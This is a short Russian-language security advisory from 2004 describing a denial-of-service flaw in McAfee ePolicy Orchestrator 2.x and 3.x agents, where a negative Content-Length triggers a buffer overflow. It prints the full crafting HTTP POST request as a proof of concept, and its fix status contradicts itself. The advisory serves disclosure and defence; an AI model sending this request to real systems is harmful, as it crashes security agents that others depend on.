Дата публикации: | 28.01.2004 |
Всего просмотров: | 2032 |
Опасность: | Низкая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Локальная сеть |
Воздействие: | Отказ в обслуживании |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
McAfee ePolicy Orchestrator 2.x
McAfee ePolicy Orchestrator 3.x |
Уязвимые версии: McAfee ePolicy Orchestrator
Описание: Уязвимость обнаружена в McAfee ePolicy Orchestrator. Удаленный пользователь может аварийно завершить работу агента. Удаленный пользователь может представить отрицательное значение параметра Content-Length, чтобы вызвать переполнение буфера и аварийно завершить работу целевого агента. POST /spipe/pkg?AgentGuid={}&Source=Agent_3.0.0 HTTP/1.0 Accept: application/octet-stream Accept-Language: en-us Content-Type: application/octet-stream User-Agent: Mozilla/4.0 (compatible; SPIPE/3.0; Windows) Host: KILL_EPO Content-Length: -1 Connection: Keep-Alive URL производителя: http://www.nai.com/us/products/mcafee/antivirus/fileserver/epo.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | CVE: CAN-2004-0095 |